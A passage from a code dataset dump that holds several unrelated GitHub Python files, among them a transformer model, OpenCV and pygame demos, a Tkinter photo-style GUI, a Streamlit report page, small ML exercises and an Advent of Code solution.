}\n)\n\njob.commit()\n","repo_name":"paulang1807/code-snippets","sub_path":"aws/glue_job_cross_account_dynamo_copy.py","file_name":"glue_job_cross_account_dynamo_copy.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71645682728","text":"from transformers import AutoConfig,AutoModel\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport sys\nimport torch\n\nclass CrossAttnHead(nn.Module):\n def __init__(self,d_model,nhead=16,dropout=0.2):\n super(CrossAttnHead, self).__init__()\n self.AttnHead=nn.MultiheadAttention(d_model,nhead,batch_first=True)\n self.dropout1=nn.Dropout(dropout)\n self.norm1= nn.LayerNorm(d_model)\n self.linear1=nn.Linear(d_model, d_model)\n self.linear2=nn.Linear(d_model, d_model)\n self.dropout2=nn.Dropout(dropout)\n self.norm2= nn.LayerNorm(d_model)\n\n def forward(self, x, attention_mask):\n res=x[:,0].unsqueeze(1)\n x, _ = self.AttnHead(x[:,0].unsqueeze(1),x[:,1:],x[:,1:],attention_mask)\n x=self.dropout1(x)\n x=self.norm1(x)\n x=res+x\n\n x=x.squeeze(1)\n res=x\n x=F.relu(self.linear1(x))\n x=self.linear2(x)\n x=self.dropout2(x)\n x=res+x\n return self.norm2(x)\n\nclass ResidualLSTM(nn.Module):\n\n def __init__(self, d_model, rnn='GRU'):\n super(ResidualLSTM, self).__init__()\n self.downsample=nn.Linear(d_model,d_model//2)\n if rnn=='GRU':\n self.LSTM=nn.GRU(d_model//2, d_model//2, num_layers=2, bidirectional=False, dropout=0.2)\n else:\n self.LSTM=nn.LSTM(d_model//2, d_model//2, num_layers=2, bidirectional=False, dropout=0.2)\n self.dropout1=nn.Dropout(0.2)\n self.norm1= nn.LayerNorm(d_model//2)\n 
self.linear1=nn.Linear(d_model//2, d_model)\n self.linear2=nn.Linear(d_model*4, d_model)\n self.dropout2=nn.Dropout(0.2)\n self.norm2= nn.LayerNorm(d_model)\n\n def forward(self, x):\n x=x.permute(1,0,2)\n res=x\n x=self.downsample(x)\n x, _ = self.LSTM(x)\n x = self.linear1(x)\n # x=self.dropout1(x)\n # x=self.norm1(x)\n # x=F.relu(self.linear1(x))\n # x=self.linear2(x)\n # x=self.dropout2(x)\n x=res+x\n x=x.permute(1,0,2)\n return self.norm2(x)\n\n\n\nclass SlidingWindowTransformerModel(nn.Module):\n def __init__(self,DOWNLOADED_MODEL_PATH, nclass, rnn='GRU', window_size=512, edge_len=64, no_backbone=False):\n super(SlidingWindowTransformerModel, self).__init__()\n config_model = AutoConfig.from_pretrained(DOWNLOADED_MODEL_PATH+'/config.json')\n self.no_backbone=no_backbone\n if no_backbone:\n pass\n else:\n self.backbone=AutoModel.from_pretrained(\n DOWNLOADED_MODEL_PATH+'/pytorch_model.bin',config=config_model)\n\n hidden_state_dimension=self.backbone.embeddings.word_embeddings.embedding_dim\n\n if rnn==\"GRU\" or rnn=='LSTM':\n self.lstm=ResidualLSTM(hidden_state_dimension,rnn)\n else:\n self.lstm=ResNet()\n\n\n\n self.classification_head=nn.Linear(hidden_state_dimension,nclass)\n self.window_size=window_size\n self.edge_len=edge_len\n self.inner_len=window_size-edge_len*2\n\n self.discourse_embedding=nn.Embedding(8,256,padding_idx=0)\n self.downsample=nn.Linear(hidden_state_dimension+256,hidden_state_dimension)\n\n def forward(self,input_ids,attention_mask,sequence_ids,discourse_type_ids,gather_indices,return_vectors=False,return_transformer_hidden_states=False):\n\n\n\n # print(L)\n # exit()\n #x=self.backbone(input_ids=input_ids,attention_mask=attention_mask,return_dict=False)[0]\n #x=self.backbone.embeddings(input_ids)#+0.1*self.discourse_embedding(discourse_type_ids)\n discourse_type_ids=self.discourse_embedding(discourse_type_ids)\n x=input_ids\n # x=torch.cat([x,discourse_type_ids],-1)\n # x=self.downsample(x)\n\n #x=torch.cat([x,])\n\n if self.no_backbone==False:\n B,L=input_ids.shape\n if L<=self.window_size:\n x=self.backbone(x,attention_mask=attention_mask,return_dict=False)[0]\n #pass\n else:\n #print(\"####\")\n #print(input_ids.shape)\n segments=(L-self.window_size)//self.inner_len\n if (L-self.window_size)%self.inner_len>self.edge_len:\n segments+=1\n elif segments==0:\n segments+=1\n x_new=self.backbone(x[:,:self.window_size],attention_mask=attention_mask[:,:self.window_size],return_dict=False)[0]\n # print(x_new.shape)\n # exit()\n\n for i in range(1,segments+1):\n start=self.window_size-self.edge_len+(i-1)*self.inner_len\n end=self.window_size-self.edge_len+(i-1)*self.inner_len+self.window_size\n end=min(end,L)\n x_next=x[:,start:end]\n mask_next=attention_mask[:,start:end]\n x_next=self.backbone(x_next,attention_mask=mask_next,return_dict=False)[0]\n #L_next=x_next.shape[1]-self.edge_len,\n if i==segments:\n x_next=x_next[:,self.edge_len:]\n else:\n x_next=x_next[:,self.edge_len:self.edge_len+self.inner_len]\n #print(x_next.shape)\n x_new=torch.cat([x_new,x_next],1)\n x=x_new\n #print(start,end)\n #print(x.shape)\n if return_transformer_hidden_states:\n transformer_hidden_states=x\n\n # print(x.shape)\n # exit()\n\n # x=torch.cat([x,discourse_type_ids],-1)\n # x=self.downsample(x)\n\n #x=self.lstm(x)\n\n #x=self.classification_head(x).squeeze(-1)\n\n pooled_outputs=[]\n if return_vectors:\n vectors=[]\n for i in range(len(x)):\n #n_discourses=gather_indices[i].max()+1\n # unique_gather_indices=torch.unique_consecutive(gather_indices[i])\n # 
unique_gather_indices=unique_gather_indices[unique_gather_indices!=-1]\n #\n # #print(unique_gather_indices)\n #\n # for j in unique_gather_indices:\n n_discourses=gather_indices[i].max()+1\n tmp=[]\n for j in range(n_discourses):\n\n\n vector=x[i][gather_indices[i]==j]\n if return_vectors:\n vectors.append(self.classification_head(vector))\n mean_vector=vector.mean(0)\n #max_vector,_=vector.max(0)\n # print(max_vector)\n # exit()\n #pooled=torch.cat([mean_vector,max_vector],-1)\n #pooled=mean_vector\n tmp.append(mean_vector)\n #pooled_outputs.append(pooled)\n tmp=torch.stack(tmp)\n tmp=self.lstm(tmp.unsqueeze(0))\n pooled_outputs.append(tmp.squeeze(0))\n\n\n #exit()\n pooled_outputs=torch.cat(pooled_outputs)\n x=pooled_outputs\n x=self.classification_head(x).squeeze(-1)\n\n\n # if return_vectors:\n # vectors=torch.stack(vectors,0)\n # vectors=self.classification_head(vectors)\n\n #seq_mask=(sequence_ids==0)\n\n #sum_L=(x*seq_mask.unsqueeze(-1)).sum(1)\n #sum_mask=seq_mask.sum(1)\n\n # print(sum_L.shape)\n # print(sum_mask.shape)\n # exit()\n\n\n #pooled=sum_L/sum_mask.unsqueeze(-1)\n\n\n\n #x=self.classification_head(x)\n else:\n transformer_hidden_states=input_ids\n x=self.lstm(transformer_hidden_states)\n x=self.classification_head(x)\n\n if return_vectors:\n return x,vectors\n else:\n return x\n\n # if return_transformer_hidden_states:\n # return x, transformer_hidden_states\n # else:\n # return x#, BIO_output\n","repo_name":"Shujun-He/TeamSKT-Feedback-Prize---Predicting-Effective-Arguments-2nd-Place-solution","sub_path":"Shujun_solution/src/Feedback_Prize/Network.py","file_name":"Network.py","file_ext":"py","file_size_in_byte":8003,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"} +{"seq_id":"11002892185","text":"import cv2\nimport os\n\nclass frameExtractor:\n def __init__(self, video_path, write_path):\n self.cap = cv2.VideoCapture(str(video_path))\n self.write_path = str(write_path)\n\n def showVideo(self, frame_interval=50):\n frame_count = 29500\n while(self.cap.isOpened()):\n ret, frame = self.cap.read()\n if ret == True:\n frame_count += 1\n if frame_count % frame_interval == 0:\n image_name = \"{:05d}.jpg\".format(int(frame_count / frame_interval))\n print(os.path.join(self.write_path, image_name))\n cv2.imwrite(os.path.join(self.write_path, image_name), frame)\n frame = cv2.resize(frame, (0, 0), None, fx = 0.5, fy = 0.4)\n cv2.imshow(\"Frame\", frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n else:\n break\n self.cap.release()\n cv2.destroyAllWindows()\n\ndef main():\n extract = frameExtractor(\"datasets/bag_upright.mp4\", \"/home/hari/cement/datasets/images\")\n extract.showVideo()\n\nif __name__ == \"__main__\":\n main()","repo_name":"jagennath-hari/ConveyorVision-Bag-Counter","sub_path":"scripts/frame_extractor.py","file_name":"frame_extractor.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"41623597914","text":"\nimport pygame\nimport sys\nfrom mi_class_Imagen import Imagen\n\npygame.init()\n#constantes\nANCHO_PANTALLA = 800\nALTO_PANTALLA = 500\nTITULO_JUEGO = \"Mi Juego Pygame\"\n\nBLANCO = (255, 255, 255)\nNEGRO = (0, 0, 0)\nROJO = (255, 0, 0)\nVERDE = (0, 255, 0)\nAZUL = (0, 0, 255)\nAZUL_CLARO = (0, 150, 255)\nAMARILLO = (255, 255, 0)\n\nPANTALLA = pygame.display.set_mode((ANCHO_PANTALLA, ALTO_PANTALLA))\n\n\npygame.display.set_caption(TITULO_JUEGO)\n\n\nFPS = 30\nRelog = pygame.time.Clock() \n\n#******** 
objeto creado con la class Imagen - VERSION POO\ncolor_vertical = {\"color_inicial\" : VERDE, \"color_colision\" : ROJO}\ncolor_horizontal = {\"color_inicial\" : AZUL_CLARO, \"color_colision\" : BLANCO}\n\nimagen_vertical = Imagen((100, 100), color_vertical, (ANCHO_PANTALLA/2 ,ALTO_PANTALLA/2))\nimagen_horizontal = Imagen((100, 100), color_horizontal, (ANCHO_PANTALLA -100, ALTO_PANTALLA/2))\n#******************************************\n\n\nwhile(True):\n Relog.tick(FPS)\n for evento in pygame.event.get():\n if evento.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n \n PANTALLA.fill(NEGRO)\n PANTALLA.blit(imagen_vertical.superficie, imagen_vertical.rectangulo) \n PANTALLA.blit(imagen_horizontal.superficie, imagen_horizontal.rectangulo)\n \n #**************** movimiento VERSION POO\n imagen_vertical.mover_imagen(\"vertical\", 10, (ANCHO_PANTALLA, ALTO_PANTALLA))\n imagen_horizontal.mover_imagen(\"horizontal\", 10, (ANCHO_PANTALLA, ALTO_PANTALLA))\n #***************************************\n \n #******************verificamos si un rectangulo colisiona con otro rectangulo- VERSION POO\n imagen_horizontal.detectar_colicion(imagen_vertical)\n #***************************************\n \n \n \n pygame.draw.line(PANTALLA, AZUL, (400, 0), (400, 800), 1)\n pygame.draw.line(PANTALLA, AZUL, (0, 250), (800, 250), 1)\n \n # pygame.display.update()# esta función se utiliza para actualizar una parte específica de la pantalla.\n pygame.display.flip()# se utiliza para actualizar toda la pantalla\n \n \n \n","repo_name":"HoracioxBarrios/programacion_1_python","sub_path":"11-pygame/cursada_pygame/5-lo anterior a POO.py","file_name":"5-lo anterior a POO.py","file_ext":"py","file_size_in_byte":2063,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"13271891040","text":"import tkinter as tk\nfrom tkinter import ttk\nimport TakePhoto as tp\nimport cv2\nimport PIL\nfrom PIL import ImageTk\nfrom PIL import Image\nimport Cartoon\nimport Paint\nimport Sketch\nimport os\n\nclass GUI():\n def __init__(self, master):\n self.tphoto = tp.TakePhoto(\"Screenshot\")\n self.tphoto.vid()\n self.photo = cv2.imread(\"./Screenshot.jpeg\")\n self.h, self.w, self.c = self.photo.shape\n \n self.imagePanel = tk.Frame(master)\n self.imagePanel.grid(row=0, column=0)\n \n \n self.controlPanel = tk.Frame(master)\n self.controlPanel.grid(row=0, column=1)\n \n \n self.imageP(self.h,self.w)\n self.ctrlP(self.h/2, 200, 0, 0, 0)\n self.ctrlP(self.h/2, 200, 0, 1, 1)\n \n \n def imageP(self,height, width):\n self.frame = tk.Frame(self.imagePanel, border = 8)\n self.frame.grid(row=0, column=0)\n self.canvas = tk.Canvas(self.frame,width=width, height=height, borderwidth=0, highlightthickness=0, bg=\"grey\")\n \n self.canvas.pack()\n self.photo = ImageTk.PhotoImage(Image.open(\"./Screenshot.jpeg\"))\n self.canvas.create_image(0,0, anchor=\"nw\", image=self.photo)\n \n def ctrlP(self, height, width, col, row, version):\n self.frame = tk.Frame(self.controlPanel, border = 8)\n self.frame.grid(row=row, column=col)\n self.cp = tk.Frame(self.frame, width=width, height=height)\n self.cp.pack()\n if version == 1:\n self.createButtons()\n else:\n self.createCbox()\n \n def createButtons(self):\n self.label1 = tk.Label(self.cp, text=\"Do you have a picture you \\nwant to manipulate? 
\ntype in the directory \"\n                                          \"here!\")\n        self.label1.place(relx=0.5, rely=0.1, anchor=\"center\")\n\n        self.tBox = tk.Text(self.cp, bg=\"white\", height=1, width=20)\n        self.tBox.place(relx=0.5, rely=0.3, anchor=\"center\")\n\n        self.loadImageButton = tk.Button(self.cp, text=\"LoadImage\")\n        self.loadImageButton[\"command\"] = self.loadImageButtonPressed\n        self.loadImageButton.place(relx=0.5, rely=0.4, anchor=\"center\")\n\n        self.takePhotoButton = tk.Button(self.cp, text=\"Re-take Photo\")\n        self.takePhotoButton[\"command\"] = self.takePhoto\n        self.takePhotoButton.place(relx=0.5, rely=0.8, anchor=\"center\")\n\n    def createCbox(self):\n        self.label2 = tk.Label(self.cp, text=\"Choose the picture style!\")\n        self.label2.place(relx=0.5, rely=0.1, anchor=\"center\")\n        self.comboBox = ttk.Combobox(self.cp, textvariable=tk.StringVar())\n        self.comboBox['values'] = ('Original', 'Cartoon', 'Sketch', 'Paint')\n        self.comboBox.current(0)\n        self.comboBox.place(relx=0.5, rely=0.2, anchor=\"center\")\n\n        self.changeButton = tk.Button(self.cp, text=\"Change Style\")\n        self.changeButton[\"command\"] = self.changeButtonPressed\n        self.changeButton.place(relx=0.5, rely=0.5, anchor=\"center\")\n\n    def takePhoto(self):\n        self.tphoto.vid()\n        self.changeImage(\"Screenshot\")\n\n    def changeImage(self, photoName):\n        for image in self.canvas.winfo_children():\n            image.destroy()\n\n        self.newPhoto = ImageTk.PhotoImage(Image.open(\"./\"+photoName+\".jpeg\"))\n        self.canvas.create_image(0,0, anchor=\"nw\", image=self.newPhoto)\n\n    def changeButtonPressed(self):\n        boxStr = self.comboBox.get()\n\n        if boxStr == \"Original\":\n            self.changeImage(\"Screenshot\")\n        elif boxStr == \"Paint\":\n            paint = Paint.Paint()\n            paint.createImage()\n            self.changeImage(\"Paint\")\n        elif boxStr == \"Sketch\":\n            sketch = Sketch.Sketch()\n            sketch.createImage()\n            self.changeImage(\"Sketch\")\n        else:\n            cart = Cartoon.Cartoon()\n            cart.createImage()\n            self.changeImage(\"Cartoon\")\n\n    def loadImageButtonPressed(self):\n        txtStr = self.tBox.get(1.0, tk.END+\"-1c\")\n        if os.path.isfile(txtStr):\n            if txtStr[-4:] == \"jpeg\" or txtStr[-3:] == \"jpg\":\n                img = cv2.imread(txtStr)\n                cv2.imwrite(\"./Screenshot.jpeg\", img)\n                self.changeImage(\"Screenshot\")\n            else:\n                self.labelWarning = tk.Label(self.cp, text=\"This software only supports jpeg or jpg type\")\n                self.labelWarning.place(relx=0.5, rely=0.5, anchor=\"center\")\n        else:\n            self.labelWarning = tk.Label(self.cp, text=\"Directory entered does not exist\")\n            self.labelWarning.place(relx=0.5, rely=0.5, anchor=\"center\")\n\n\n\n","repo_name":"ryuoda123/PhotoManipulation","sub_path":"GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":4718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72023994087","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\ndef simulate_dice_rolls(num_rolls):\r\n    # Simulate rolling two dice and return the sum of each roll\r\n    dice_rolls = np.random.randint(1, 7, size=(num_rolls, 2))\r\n    sum_of_rolls = np.sum(dice_rolls, axis=1)\r\n    return sum_of_rolls\r\n\r\ndef plot_gaussian_distribution(data):\r\n    # Build a histogram and overlay a fitted Gaussian bell curve\r\n    plt.hist(data, bins=range(2, 14), density=True, alpha=0.6, color='g')\r\n    \r\n    mu, sigma = np.mean(data), np.std(data)\r\n    x = np.linspace(2, 13, 100)\r\n    y = (1 / (sigma * np.sqrt(2 * np.pi))) * np.exp(-0.5 * ((x - mu) / sigma)**2)\r\n    \r\n    plt.plot(x, y, '--', color='b')\r\n    plt.title('Distribution 
of the Sum of Two Dice')\r\n    plt.xlabel('Sum of the Dice')\r\n    plt.ylabel('Normalized Frequency')\r\n    plt.show()\r\n\r\n# Simulate 10000 rolls of two dice\r\nnum_simulations = 10000\r\ndice_sum_results = simulate_dice_rolls(num_simulations)\r\n\r\n# Plot the results as a Gaussian bell curve\r\nplot_gaussian_distribution(dice_sum_results)\r\n","repo_name":"frappefactible/Factible-framework","sub_path":"campana de gauss prueba 1 cgp.py","file_name":"campana de gauss prueba 1 cgp.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37151142094","text":"import streamlit as st\nimport filters\nimport pandas as pd\nimport config\n\n\ndef display(options):\n    if not config.get_materialization_complete():\n        st.info(\"Please wait for materialization to complete before running reports.\")\n        st.button(\n            \"Refresh Status\",\n            on_click=config.refresh,\n            key=\"refresh-materialization-status\",\n        )\n        return\n\n    credit_cost = config.get_compute_credit_cost()\n\n    df = pd.DataFrame(list(options.keys()), columns=[\"tab\"])\n    report = st.selectbox(\"Select Report\", df, index=0)\n\n    st.title(report)\n    filter_container = st.expander(\"Filters\", expanded=False)\n    st.container()\n\n    filter_values = filters.display(filter_container)\n    if filter_values.valid():\n\n        with st.spinner(f\"\"\"Loading {report} Report\"\"\"):\n            options[report](filter_values, credit_cost)\n","repo_name":"sundeck-io/OpsCenter","sub_path":"app/ui/reports.py","file_name":"reports.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"31122585783","text":"my_foods = [ 'pizza', 'falafel', 'carrot cake']\nfriends_food = my_foods[:]\n\nmy_foods.append('cannoli')\nfriends_food.append('ice cream')\n\nprint ('My favourite foods are:')\nfor food in my_foods [:]:\n\tprint (food.title())\n\nprint(\"My friend's foods are:\")\nfor foodfriend in friends_food[:]:\n\tprint (foodfriend.title())\n\n","repo_name":"StephanieLoomans/learning_python","sub_path":"myfoods_loops.py","file_name":"myfoods_loops.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37456726094","text":"# Dot product\n# https://programmers.co.kr/learn/courses/30/lessons/70128\n\n# Multiply the entries of lists a and b at each matching index, then add all of the products together\n\ndef solution(a, b):\n    answer = 0\n    for i in range(len(a)):\n        answer += a[i] * b[i]\n    return answer\n\nprint(solution([1, 2, 3, 4], [-3, -1, 0, 2]))\nprint(solution([-1, 0, 1], [1, 0, -1]))","repo_name":"dueytree/Algorithm_test","sub_path":"dot_product.py","file_name":"dot_product.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15150804999","text":"# models to predict the goals\r\n'''\r\n    Option 1 --> Predict the total goals (Regression)\r\n    features --> DTO, Time, HomeTeam, AwayTeam, Referee\r\n    \r\n    Option 2 --> Predict whether the total goals go over/under 2.5 (Classifier)\r\n'''\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nfrom datasets_the_goals import df_2\r\n\r\nfrom sklearn.preprocessing import LabelEncoder, StandardScaler\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.linear_model import LinearRegression, SGDClassifier\r\nfrom sklearn.tree import 
DecisionTreeRegressor, DecisionTreeClassifier\r\nfrom sklearn.metrics import mean_squared_error, mean_absolute_error, accuracy_score, recall_score, confusion_matrix\r\n\r\ndef label_encoder(data):\r\n    data[['Time','HomeTeam','AwayTeam','Referee']] = data[['Time','HomeTeam','AwayTeam','Referee']].apply(LabelEncoder().fit_transform) \r\n    return data\r\n\r\ndef split_the_data(data, test_size):\r\n    x = data.drop('TG', axis=1)\r\n    y = data['TG']\r\n    return train_test_split(x, y, test_size=test_size, random_state=10)\r\n\r\ndef standard_x(x_train, x_test):\r\n    # fit the scaler on the training data only, then apply it to both splits\r\n    scaler = StandardScaler().fit(x_train)\r\n    x_train = scaler.transform(x_train)\r\n    x_test = scaler.transform(x_test)\r\n    return x_train, x_test\r\n\r\ndef predict(model, x_train, x_test, y_train, y_test):\r\n    model.fit(x_train, y_train)\r\n    y_pred = model.predict(x_test)\r\n    acc = accuracy_score(y_test, y_pred)\r\n    print(acc)\r\n\r\ndef metrics(y_test, y_pred):\r\n    mse = np.sqrt(mean_squared_error(y_pred, y_test))\r\n    mae = mean_absolute_error(y_pred, y_test)\r\n    acc = accuracy_score(y_test, y_pred)\r\n    rec = recall_score(y_test, y_pred)\r\n    confusion_matrix_ = confusion_matrix(y_test, y_pred)\r\n    return mse, mae, acc, rec, confusion_matrix_\r\n\r\nopa = np.array([10,0,13,0,2.5,2.5,2.333,5.333]).reshape(-1,1)\r\n\r\ndf_1_LE = label_encoder(df_2)\r\nx_train, x_test, y_train, y_test = split_the_data(df_1_LE, 0.25)\r\nx_train, x_test = standard_x(x_train, x_test)\r\npredict(DecisionTreeClassifier(max_depth=4), x_train, x_test, y_train, y_test)\r\n","repo_name":"lgomesgl/Predict_gols","sub_path":"predict_the_goals.py","file_name":"predict_the_goals.py","file_ext":"py","file_size_in_byte":1980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36126951446","text":"from bisect import bisect, insort\nfrom .common import memoize\n\nclass Interval(object):\n    \"\"\"\n    Represents an interval of time defined by two timestamps.\n\n    Parameters:\n    -----------\n\n    start: float.\n        Starting value.\n    end : float\n        Ending value.\n    \"\"\"\n\n    __slots__ = (\"start\", \"end\")\n\n    def __init__(self, start, end):\n        if end < start:\n            raise ValueError(\"End timestamp:{end} cannot be less than start timestamp:{start}\".format(start=start, end=end))\n        self.start, self.end = float(start), float(end)\n\n    def __repr__(self):\n        return \"Interval(start={:.3f}ms, end={:.3f}ms, duration={:.3f}ms)\".format(\n            self.start * 1000, self.end * 1000, self.duration * 1000)\n\n    @property\n    def duration(self):\n        \"\"\"Returns float\"\"\"\n        return self.end - self.start\n\n    @memoize\n    def within(self, timestamp):\n        \"\"\"Returns true if timestamp falls within interval\"\"\"\n        return True if (timestamp >= self.start) and \\\n            (timestamp <= self.end) else False\n\n\nclass IntervalList(list):\n    \"\"\"\n    List with objects with intervals, sorted and sliceable by interval.\n    \"\"\"\n    \n    def __init__(self, iterable=None):\n        self._intervals = []\n        self._start_timestamps = []\n        self._end_timestamps = []\n        if iterable:\n            for item in iterable:\n                if hasattr(item, 'interval'):\n                    self.append(item)\n                else:\n                    raise AttributeError('{} object has no attribute `interval`'.format(type(item)))\n\n    def __repr__(self):\n        return '\\n'.join([item.__repr__() for item in self])\n\n    @property\n    def _start_times(self):\n        return self._start_timestamps\n\n    @property\n    def _end_times(self):\n        return self._end_timestamps\n\n    @property\n    def duration(self):\n        \"\"\"Duration of events in seconds\"\"\"\n        return sum(interval.duration for interval in self._intervals)\n\n    def __add_interval(self, obj):\n        \"\"\"Add interval to (sorted) intervals 
list\"\"\"\n start, end = obj.interval.start, obj.interval.end\n idx = bisect(self._start_timestamps, start)\n insort(self._end_timestamps, end)\n self._start_timestamps.insert(idx, start) # insert into self based on start\n self._intervals.insert(idx, obj.interval)\n return idx\n\n def append(self, obj):\n \"\"\"Append new event to list\"\"\"\n try:\n obj.interval\n except AttributeError:\n raise TypeError(\"Must have interval attribute\")\n super(self.__class__, self).insert(self.__add_interval(obj), obj)\n\n def slice(self, interval, trimmed=True):\n \"\"\"\n Returns list of objects whose interval fall\n between the specified interval.\n\n Parameters:\n -----------\n trimmed : bool, default True\n Trim interval of returned list of objects to fall within specified\n interval\n \"\"\"\n if interval is None:\n return self\n\n start, end = interval.start, interval.end\n idx_left = bisect(self._start_timestamps, start)\n idx_right = bisect(self._start_timestamps, end)\n idx_left = idx_left - 1 if idx_left >= len(self) else idx_left\n idx_right = None if idx_right > len(self) else idx_right\n idx = slice(idx_left, idx_right) if idx_left != idx_right else slice(idx_left - 1, idx_left)\n\n ll = self[idx]\n rv = IntervalList()\n \n if trimmed and len(ll):\n for item in ll:\n trim = False\n item_start, item_end = item.interval.start, item.interval.end\n if item_start < start:\n trim, item_start = True, start\n if item_end > end:\n trim, item_end = True, end\n if trim:\n rv.append(item._replace(interval=Interval(item_start, item_end)))\n else:\n rv.append(item)\n\n return rv","repo_name":"corakwue/ftrace","sub_path":"ftrace/interval.py","file_name":"interval.py","file_ext":"py","file_size_in_byte":4012,"program_lang":"python","lang":"en","doc_type":"code","stars":65,"dataset":"github-code","pt":"53"} +{"seq_id":"41318231912","text":"import pandas as pd\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn import tree\n\ndf = pd.read_csv(\"salaries.csv\")\nprint(df.head())\n\ninput = df.drop('salary_more_then_100k',axis=1)\n\ntarget = df['salary_more_then_100k']\n\nle_company = LabelEncoder()\nle_job = LabelEncoder()\nle_degree = LabelEncoder()\n\ninput['company_n'] = le_company.fit_transform(input['company'])\ninput['job_n'] = le_job.fit_transform(input['job'])\ninput['degree_n'] = le_degree.fit_transform(input['degree'])\n\ninput_n = input.drop(['company','job','degree'],axis='columns')\n\nmodel = tree.DecisionTreeClassifier()\nmodel.fit(input_n,target)\nprint(model.score(input_n,target))\n\nresult = model.predict([[0,0,2]])\nprint(result)","repo_name":"sivasaraa/scikit-ML","sub_path":"salary-DT.py","file_name":"salary-DT.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72085544487","text":"from itertools import permutations\r\nimport itertools\r\n\r\nclass Command:\r\n op = None\r\n minX = maxX = minY = maxY = minZ = maxZ = None\r\n\r\n def __init__(self, op, minX, maxX, minY, maxY, minZ, maxZ) -> None:\r\n self.op = op\r\n self.minX = minX\r\n self.maxX = maxX\r\n self.minY = minY\r\n self.maxY = maxY\r\n self.minZ = minZ\r\n self.maxZ = maxZ\r\n \r\n def get_cubes(self):\r\n x = range(self.minX, self.maxX+1)\r\n y = range(self.minY, self.maxY+1)\r\n z = range(self.minZ, self.maxZ+1)\r\n s = set()\r\n for dx in x:\r\n for dy in y:\r\n for dz in z:\r\n s.add((dx,dy,dz))\r\n return s\r\n \r\n def __repr__(self) -> str:\r\n return f'{self.op} x={self.minX}..{self.maxX}, 
y={self.minY}..{self.maxY}, z={self.minZ}..{self.maxZ}'\r\n\r\ndef run_command(command, s):\r\n if command.op == 'on':\r\n s = s.union(command.get_cubes())\r\n else:\r\n s = s.difference(command.get_cubes())\r\n return s\r\n\r\ndef main():\r\n input = [line.strip() for line in open('input.txt', 'r')]\r\n\r\n commands = []\r\n for line in input:\r\n op = line.split()[0]\r\n minX, maxX = line.split(' ')[1].split(',')[0].split('=')[1].split('..')\r\n minY, maxY = line.split(',')[1].split('=')[1].split('..')\r\n minZ, maxZ = line.split(',')[2].split('=')[1].split('..')\r\n c = Command(op, int(minX), int(maxX), int(minY), int(maxY), int(minZ), int(maxZ))\r\n commands.append(c)\r\n\r\n s = set([])\r\n for command in commands:\r\n if command.minX >= -50 and command.maxX <= 50 and command.minY >= -50 and command.maxY <= 50 and command.minZ >= -50 and command.maxZ <= 50: \r\n s = run_command(command, s)\r\n print(len(s))\r\n\r\nif __name__ == '__main__':\r\n main()","repo_name":"GMainardi/Advent-2021","sub_path":"22/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"31562193611","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nmain \r\n\r\n\r\n\"\"\"\r\n\r\nimport asyncio\r\nimport websockets\r\n\r\n\r\nfrom functions import *\r\n\r\nif __name__ == '__main__':\r\n \r\n \r\n\r\n port = 8088 \r\n print(\"Starting server on {}...\".format(get_ip()) + 'oon port:' + str(port))\r\n \r\n \r\n loop = asyncio.get_event_loop()\r\n\r\n \r\n\r\n\r\n \r\n watch_server = loop.run_until_complete(websockets.serve(watch, '0.0.0.0', port))\r\n try:\r\n loop.run_forever()\r\n except KeyboardInterrupt:\r\n print(\"\\nBye bye...\")\r\n\r\n watch_server.close()\r\n loop.run_until_complete(watch_server.wait_closed())\r\n \r\n \r\n","repo_name":"nikinicole/Stream_HR_HRV_Tizen","sub_path":"get_galaxy_data.py","file_name":"get_galaxy_data.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73537635367","text":"import pygame, sys\nfrom pygame.locals import *\n\n# Create the constants (go ahead and experiment with different values)\nBOARDWIDTH = 4 # number of columns in the board\nBOARDHEIGHT = 4 # number of rows in the board\nTILESIZE = 80\nWINDOWWIDTH = 640\nWINDOWHEIGHT = 480\nFPS = 30\nBLANK = None\n\n# set up the colors\nBLACK = ( 0, 0, 0)\nWHITE = (255, 255, 255)\nRED = (255, 0, 0)\nGREEN = ( 0, 255, 0)\nBLUE = ( 0, 25, 255)\n\npygame.init()\nDISPLAYSURF = pygame.display.set_mode((WINDOWWIDTH, WINDOWHEIGHT),0,32)\ntext = pygame.font.Font(\"..\\..\\\\resource\\QinYuanJ.TTF\",25)\ntext_fmt = text.render(\"进程已结束,退出代码\",1,BLACK)\n\ntext_matrics = 